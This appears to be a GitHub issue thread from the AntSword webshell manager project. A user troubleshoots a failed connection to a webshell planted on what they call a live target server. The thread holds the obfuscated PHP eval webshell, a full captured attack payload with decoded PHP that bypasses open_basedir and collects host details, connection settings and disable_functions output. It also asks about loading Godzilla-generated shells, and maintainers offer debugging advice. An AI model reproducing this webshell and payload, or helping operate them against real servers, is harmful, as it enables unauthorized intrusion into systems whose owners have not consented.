search

AntSwordProject / antSword

中国蚁剑是一款跨平台的开源网站管理工具。AntSword is a cross-platform website management toolkit.
https://www.yuque.com/antswordproject/antsword
MIT License
3.62k stars 573 forks source link

连不上shell,http 500,但是在浏览器post可以正常连上shell #306

Closed Weltolk closed 2 years ago

Weltolk commented 2 years ago

报告 Bug

Bug 详细描述

shell.php:

<?php eval(base64_decode(base64_encode(base64_decode('DQpldmFsKCRfUE9TVFsnYSddKTs=')))); ?>

本地可以正常连接: image

目标机器上的shell(和本地的shell一样): image

通过浏览器对目标机器上的shell post可以正常连接: image

蚁剑连接会提示ssl证书过期,这时勾选"忽略https证书"再连接,会提示连接失败,http 500:

新功能建议

新功能描述

询问

shell 连接 Bug

  1. 服务端操作系统

    Windows NT xxxxxxxxxx 10.0 build 17763 (Windows Server 2016) AMD64

  2. 服务端shell代码

<?php eval(base64_decode(base64_encode(base64_decode('DQpldmFsKCRfUE9TVFsnYSddKTs=')))); ?>
  1. 服务端环境配置

无法跨目录读取php.ini,而且是实战环境,所以提供部分phpinfo():

<html>
<body>
<!--StartFragment-->

PHP Version 7.4.26

System | Windows NT xxxxxxxxxx 10.0 build 17763 (Windows Server 2016) AMD64
-- | --
Build Date | Nov 16 2021 18:08:06
Compiler | Visual C++ 2017
Architecture | x64
Configure Command | cscript /nologo /e:jscript configure.js "--enable-snapshot-build" "--enable-debug-pack" "--disable-zts" "--with-pdo-oci=c:\php-snap-build\deps_aux\oracle\x64\instantclient_12_1\sdk,shared" "--with-oci8-12c=c:\php-snap-build\deps_aux\oracle\x64\instantclient_12_1\sdk,shared" "--enable-object-out-dir=../obj/" "--enable-com-dotnet=shared" "--without-analyzer" "--with-pgo"
Server API | CGI/FastCGI
Virtual Directory Support | disabled
Configuration File (php.ini) Path | no value
Loaded Configuration File | C:\BtSoft\php\74\php.ini
Scan this dir for additional .ini files | (none)
Additional .ini files parsed | (none)
PHP API | 20190902
PHP Extension | 20190902
Zend Extension | 320190902
Zend Extension Build | API320190902,NTS,VC15
PHP Extension Build | API20190902,NTS,VC15
Debug Build | no
Thread Safety | disabled
Zend Signal Handling | disabled
Zend Memory Manager | enabled
Zend Multibyte Support | provided by mbstring
IPv6 Support | enabled
DTrace Support | disabled
Registered PHP Streams | php, file, glob, data, http, ftp, zip, compress.zlib, compress.bzip2, https, ftps, phar
Registered Stream Socket Transports | tcp, udp, ssl, tls, tlsv1.0, tlsv1.1, tlsv1.2, tlsv1.3
Registered Stream Filters | convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, zlib.*, bzip2.*, mcrypt.*, mdecrypt.*

<!--EndFragment-->
</body>
</html>
  1. 客户端连接配置
{"category":"test","url":"https://xxxx.com/a.php","pwd":"a","note":"","type":"php","ip":"000.000.000.000",
"addr":"US AWS","encode":"UTF8","encoder":"default","decoder":"default","httpConf":{"body":{},"headers":{}},
"otherConf":{"add-MassData":0,"chunk-step-byte-max":"3","chunk-step-byte-min":"2","command-path":"",
"custom-datatag-tage":"","custom-datatag-tags":"","filemanager-cache":1,"ignore-https":1,"random-Prefix":"2",
"request-timeout":"10000","terminal-cache":0,"upload-fragment":"500","use-chunk":0,"use-custom-datatag":0,
"use-multipart":0,"use-random-variable":0},"ctime":1653696365555,"utime":1653696365555,"_id":"lhLODXXYLNoe5555"}

另外问下AntSword怎么添加Godzilla生成的马 Godzilla生成的马有一个key变量,AntSword添加的时候不知道加在哪里 如果可以添加的话就不用上面的那个bug里说的webshell了

Godzilla生成的马: image

AntSword添加webshell: image

Medicean commented 2 years ago

可以挂上 Burpsuite 代理去看一下 500 的具体原因。根据你的描述来看,我推测可能是 disable_function 限制了某个函数导致的。

Weltolk commented 2 years ago

可以挂上 Burpsuite 代理去看一下 500 的具体原因。根据你的描述来看,我推测可能是 disable_function 限制了某个函数导致的。

burp suite里返回包只有一个500,没有具体的报错信息... image

POST /config/admin.php HTTP/1.1 Host: xxxx.cn:443 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN) Content-Type: application/x-www-form-urlencoded Content-Length: 818 Connection: close

a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(%22%2F%3B%7C%3A%2F%22%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.10925d914c%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%220286%22.%2292b81%22%3Becho%20%40asenc(%24output)%3Becho%20%2256232%22.%2281f12%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

url解码之后:

@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split("/;|:/", $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item . "/.10925d914c";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", " /");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out)
{
    return $out;
};
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "0286" . "92b81";
    echo @asenc($output);
    echo "56232" . "81f12";
}
ob_start();
try {
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}  ";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= " ";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= " {$s}";
    echo $R;;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

这个是phpinfo();里的disable_functions:

disable_functions

passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,
ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,exec | 

passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,
ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,exec

我尝试修改蚁剑连接时发送的包,但是发现删除包内的同一条语句,有时会返回200,有时又是500

Medicean commented 2 years ago

@Weltolk 改一下 payload 把 display_errors 打开看看具体报错,或者贴一下详细的 phpinfo 信息呢

Weltolk commented 2 years ago

@Weltolk 改一下 payload 把 display_errors 打开看看具体报错,或者贴一下详细的 phpinfo 信息呢

目标站点删站跑路了= =

DVKunion commented 2 years ago

@Weltolk 试一下不要使用default编码,可能会解决问题